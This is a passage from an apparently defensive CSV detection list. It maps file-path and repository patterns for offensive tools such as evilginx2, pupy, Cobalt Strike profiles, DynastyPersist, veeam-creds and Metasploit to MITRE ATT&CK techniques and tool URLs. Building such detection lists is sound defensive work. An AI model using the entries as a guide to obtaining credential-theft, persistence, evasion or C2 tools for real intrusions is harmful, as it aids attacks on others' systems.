use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*/usr/share/evilginx*",".{0,1000}\/usr\/share\/evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*/usr/share/keyrings/tor-archive-keyring*",".{0,1000}\/usr\/share\/keyrings\/tor\-archive\-keyring.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*/usr/share/kidlogger*",".{0,1000}\/usr\/share\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/usr/share/wordlists/*.txt*",".{0,1000}\/usr\/share\/wordlists\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/usr/src/netexec*",".{0,1000}\/usr\/src\/netexec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/utils/addcomputer.py*",".{0,1000}\/utils\/addcomputer\.py.{0,1000}","offensive_tool_keyword","sam-the-admin","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","10","959","191","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" "*/utils/obfuscate.py*",".{0,1000}\/utils\/obfuscate\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/UTWOqVQ132/*",".{0,1000}\/UTWOqVQ132\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/UUID_bypass.py*",".{0,1000}\/UUID_bypass\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/v1.0.0/moonwalk_linux*",".{0,1000}\/v1\.0\.0\/moonwalk_linux.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*/vainject.c*",".{0,1000}\/vainject\.c.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/vajra/phishApp.py*",".{0,1000}\/vajra\/phishApp\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/var/lib/ptunnel*",".{0,1000}\/var\/lib\/ptunnel.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*/var/lib/tor/*",".{0,1000}\/var\/lib\/tor\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/var/log/apache2/forensic_log-10080.log*",".{0,1000}\/var\/log\/apache2\/forensic_log\-10080\.log.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*/var/log/evilginx*",".{0,1000}\/var\/log\/evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*/var/log/exegol/*.log*",".{0,1000}\/var\/log\/exegol\/.{0,1000}\.log.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/var/log/tor/*",".{0,1000}\/var\/log\/tor\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/var/tmp/.memory/diamorphine.c*",".{0,1000}\/var\/tmp\/\.memory\/diamorphine\.c.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*/var/tmp/.memory/diamorphine.h*",".{0,1000}\/var\/tmp\/\.memory\/diamorphine\.h.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*/var/www/html/dynasty_rce*",".{0,1000}\/var\/www\/html\/dynasty_rce.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*/var0xshell.git*",".{0,1000}\/var0xshell\.git.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","1","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*/vas/fuzzers/fuzz/*",".{0,1000}\/vas\/fuzzers\/fuzz\/.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*/VBad.git*",".{0,1000}\/VBad\.git.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "*/VDR.git*",".{0,1000}\/VDR\.git.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*/VDR-main.zip",".{0,1000}\/VDR\-main\.zip","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*/VectorKernel.git*",".{0,1000}\/VectorKernel\.git.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*/veeam_dump.py*",".{0,1000}\/veeam_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/veeam-creds.git*",".{0,1000}\/veeam\-creds\.git.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*/Vegile.git*",".{0,1000}\/Vegile\.git.{0,1000}","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","695","162","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*/Venom.git*",".{0,1000}\/Venom\.git.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/venom.git*",".{0,1000}\/venom\.git.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/venom.sh *",".{0,1000}\/venom\.sh\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/Venom.v1.0.1.7z*",".{0,1000}\/Venom\.v1\.0\.1\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/Venom.v1.0.2.7z*",".{0,1000}\/Venom\.v1\.0\.2\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/Venom.v1.0.7z*",".{0,1000}\/Venom\.v1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/Venom.v1.1.0.7z*",".{0,1000}\/Venom\.v1\.1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/Venom/tarball/v*",".{0,1000}\/Venom\/tarball\/v.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/Venom/zipball/v*",".{0,1000}\/Venom\/zipball\/v.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/ventrilo-info.nse*",".{0,1000}\/ventrilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/versant-info.nse*",".{0,1000}\/versant\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/viper.conf*",".{0,1000}\/viper\.conf.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/viper.py*",".{0,1000}\/viper\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/viper.sln*",".{0,1000}\/viper\.sln.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/viper/Docker/*",".{0,1000}\/viper\/Docker\/.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/viper/Docker/nginxconfig/htpasswd*",".{0,1000}\/viper\/Docker\/nginxconfig\/htpasswd.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/vipermsf*",".{0,1000}\/vipermsf.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*/viperpython*",".{0,1000}\/viperpython.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/viperpython.git*",".{0,1000}\/viperpython\.git.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/virtualenvs/icebreaker*",".{0,1000}\/virtualenvs\/icebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/VirusTotalC2/*",".{0,1000}\/VirusTotalC2\/.{0,1000}","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","7","82","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" "*/VisualBasicObfuscator*",".{0,1000}\/VisualBasicObfuscator.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*/vmauthd-brute.nse*",".{0,1000}\/vmauthd\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vmware_enum_*.rb*",".{0,1000}\/vmware_enum_.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/VMware-CVE-2022-22954*",".{0,1000}\/VMware\-CVE\-2022\-22954.{0,1000}","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/sherlocksecurity/VMware-CVE-2022-22954","1","1","N/A","N/A","3","285","53","2022-04-13T06:15:11Z","2022-04-11T13:59:23Z" "*/vmware-version.nse*",".{0,1000}\/vmware\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vnc-brute.nse*",".{0,1000}\/vnc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vncdll.*",".{0,1000}\/vncdll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - 